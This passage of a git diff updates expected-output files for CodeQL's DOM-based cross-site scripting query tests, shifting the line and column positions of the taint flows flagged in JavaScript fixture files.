.search | tst.js:486:22:486:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:491:23:491:45 | locatio ... bstr(1) | tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:491:23:491:35 | location.hash | user-provided value | -| tst.js:494:18:494:40 | locatio ... bstr(1) | tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:494:18:494:30 | location.hash | user-provided value | -| tst.js:501:33:501:63 | decodeU ... n.hash) | tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:501:43:501:62 | window.location.hash | user-provided value | -| tst.js:509:18:509:54 | target. ... "), '') | tst.js:508:16:508:39 | documen ... .search | tst.js:509:18:509:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:508:16:508:39 | documen ... .search | user-provided value | +| tst.js:4:18:4:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:4:18:4:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:6:18:6:126 | "" | tst.js:6:37:6:58 | documen ... on.href | tst.js:6:18:6:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:6:37:6:58 | documen ... on.href | user-provided value | +| tst.js:9:5:9:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:9:5:9:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:15:18:15:35 | params.get('name') | tst.js:14:25:14:41 | document.location | tst.js:15:18:15:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:14:25:14:41 | document.location | user-provided value | +| tst.js:18:18:18:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:18:18:18:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:22:18:22:23 | target | tst.js:24:5:24:28 | documen ... .search | tst.js:22:18:22:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:24:5:24:28 | documen ... .search | user-provided value | +| tst.js:29:16:29:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:34:16:34:44 | baz(doc ... search) | tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:34:20:34:43 | documen ... .search | user-provided value | +| tst.js:39:16:39:45 | wrap(do ... search) | tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:39:21:39:44 | documen ... .search | user-provided value | +| tst.js:46:16:46:45 | chop(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | +| tst.js:47:16:47:45 | chop(do ... search) | tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:47:21:47:44 | documen ... 
.search | user-provided value | +| tst.js:48:16:48:32 | wrap(chop(bar())) | tst.js:27:10:27:33 | documen ... .search | tst.js:48:16:48:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:53:25:53:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:53:25:53:48 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:54:25:54:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:54:25:54:48 | documen ... .search | user-provided value | +| tst.js:56:16:56:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:60:20:60:20 | x | tst.js:58:3:58:26 | documen ... .search | tst.js:60:20:60:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:58:3:58:26 | documen ... .search | user-provided value | +| tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:63:49:63:72 | documen ... .search | user-provided value | +| tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:67:26:67:49 | documen ... .search | user-provided value | +| tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:68:25:68:48 | documen ... .search | user-provided value | +| tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... 
.search | Cross-site scripting vulnerability due to $@. | tst.js:70:33:70:56 | documen ... .search | user-provided value | +| tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:71:32:71:55 | documen ... .search | user-provided value | +| tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:76:39:76:62 | documen ... .search | user-provided value | +| tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:30:82:53 | documen ... .search | user-provided value | +| tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:88:25:88:48 | documen ... .search | user-provided value | +| tst.js:95:18:95:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:95:18:95:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:120:18:120:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:120:18:120:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:135:49:135:49 | v | tst.js:132:29:132:50 | window. ... .search | tst.js:135:49:135:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:132:29:132:50 | window. ... .search | user-provided value | +| tst.js:139:29:139:46 | xssSourceService() | tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:142:40:142:61 | window. ... 
.search | user-provided value | +| tst.js:164:28:164:33 | target | tst.js:161:18:161:41 | documen ... .search | tst.js:164:28:164:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:161:18:161:41 | documen ... .search | user-provided value | +| tst.js:170:31:170:37 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:170:31:170:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:172:42:172:48 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:172:42:172:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:173:33:173:39 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:173:33:173:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:175:54:175:60 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:175:54:175:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:176:45:176:51 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:176:45:176:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:177:49:177:55 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:177:49:177:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:183:67:183:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:183:67:183:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:184:67:184:73 | tainted | tst.js:181:19:181:42 | documen ... 
.search | tst.js:184:67:184:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:196:28:196:46 | this.state.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:196:28:196:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:197:28:197:46 | this.state.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:197:28:197:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:198:28:198:46 | this.state.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:198:28:198:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:202:32:202:49 | prevState.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:202:32:202:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:209:28:209:46 | this.props.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:209:28:209:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:210:28:210:46 | this.props.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:210:28:210:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:211:28:211:46 | this.props.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:211:28:211:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... 
.search | user-provided value | +| tst.js:215:32:215:49 | prevProps.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:215:32:215:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:235:60:235:82 | this.st ... Tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:235:60:235:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:243:7:243:17 | window.name | user-provided value | +| tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:244:7:244:10 | name | user-provided value | +| tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:248:11:248:21 | window.name | user-provided value | +| tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:264:22:264:29 | location | user-provided value | +| tst.js:272:59:272:65 | tainted | tst.js:269:19:269:29 | window.name | tst.js:272:59:272:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:269:19:269:29 | window.name | user-provided value | +| tst.js:287:20:287:20 | e | tst.js:285:9:285:16 | location | tst.js:287:20:287:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:285:9:285:16 | location | user-provided value | +| tst.js:295:20:295:20 | e | tst.js:292:10:292:17 | location | tst.js:295:20:295:20 | e | Cross-site scripting vulnerability due to $@. 
| tst.js:292:10:292:17 | location | user-provided value | +| tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:300:35:300:42 | location | user-provided value | +| tst.js:316:18:316:35 | params.get('name') | tst.js:311:18:311:34 | document.location | tst.js:316:18:316:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:311:18:311:34 | document.location | user-provided value | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | tst.js:325:20:325:36 | document.location | tst.js:327:5:327:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:325:20:325:36 | document.location | user-provided value | +| tst.js:333:12:333:17 | target | tst.js:332:16:332:39 | documen ... .search | tst.js:333:12:333:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:332:16:332:39 | documen ... .search | user-provided value | +| tst.js:340:16:340:21 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:340:16:340:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:344:21:344:26 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:344:21:344:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:347:18:347:23 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:347:18:347:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:357:18:357:23 | target | tst.js:355:16:355:39 | documen ... .search | tst.js:357:18:357:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:16:355:39 | documen ... .search | user-provided value | +| tst.js:367:18:367:23 | target | tst.js:364:16:364:39 | documen ... 
.search | tst.js:367:18:367:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:369:18:369:29 | target.taint | tst.js:364:16:364:39 | documen ... .search | tst.js:369:18:369:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:375:18:375:30 | target.taint3 | tst.js:374:19:374:42 | documen ... .search | tst.js:375:18:375:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:374:19:374:42 | documen ... .search | user-provided value | +| tst.js:380:18:380:30 | target.taint5 | tst.js:364:16:364:39 | documen ... .search | tst.js:380:18:380:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:389:18:389:30 | target.taint7 | tst.js:364:16:364:39 | documen ... .search | tst.js:389:18:389:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:392:18:392:30 | target.taint8 | tst.js:364:16:364:39 | documen ... .search | tst.js:392:18:392:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:400:18:400:24 | payload | tst.js:399:17:399:36 | window.location.hash | tst.js:400:18:400:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:399:17:399:36 | window.location.hash | user-provided value | +| tst.js:404:20:404:27 | match[1] | tst.js:402:15:402:34 | window.location.hash | tst.js:404:20:404:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:402:15:402:34 | window.location.hash | user-provided value | +| tst.js:407:18:407:51 | window. ... '#')[1] | tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:51 | window. ... 
'#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:407:18:407:37 | window.location.hash | user-provided value | +| tst.js:413:18:413:89 | target. ... data>') | tst.js:411:16:411:39 | documen ... .search | tst.js:413:18:413:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:411:16:411:39 | documen ... .search | user-provided value | +| tst.js:423:28:423:33 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:423:28:423:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:424:33:424:38 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:424:33:424:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:425:34:425:39 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:425:34:425:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:426:41:426:46 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:426:41:426:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:427:44:427:49 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:427:44:427:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:428:32:428:37 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:428:32:428:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:438:18:438:23 | source | tst.js:436:16:436:39 | documen ... .search | tst.js:438:18:438:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... 
.search | user-provided value | +| tst.js:439:18:439:42 | ansiToH ... source) | tst.js:436:16:436:39 | documen ... .search | tst.js:439:18:439:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:446:21:446:26 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:446:21:446:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:448:19:448:24 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:448:19:448:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:450:20:450:25 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:450:20:450:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:456:19:456:21 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:456:19:456:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:457:26:457:28 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:457:26:457:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:458:25:458:27 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:458:25:458:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:459:20:459:22 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:459:20:459:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:469:22:469:24 | url | tst.js:454:13:454:36 | documen ... 
.search | tst.js:469:22:469:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:474:23:474:45 | locatio ... bstr(1) | tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:474:23:474:35 | location.hash | user-provided value | +| tst.js:477:18:477:40 | locatio ... bstr(1) | tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:477:18:477:30 | location.hash | user-provided value | +| tst.js:484:33:484:63 | decodeU ... n.hash) | tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:484:43:484:62 | window.location.hash | user-provided value | +| tst.js:492:18:492:54 | target. ... "), '') | tst.js:491:16:491:39 | documen ... .search | tst.js:492:18:492:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:491:16:491:39 | documen ... .search | user-provided value | | typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected index 8e4fdb09b996..a9bc4f7c3a0b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected @@ -152,7 +152,7 @@ nodes | dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | | event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | jwt.js:4:36:4:39 | data | semmle.label | data | | jwt.js:5:9:5:34 | decoded | semmle.label | decoded | | jwt.js:5:19:5:34 | jwt_decode(data) | semmle.label | jwt_decode(data) | 
@@ -348,9 +348,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -373,240 +373,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
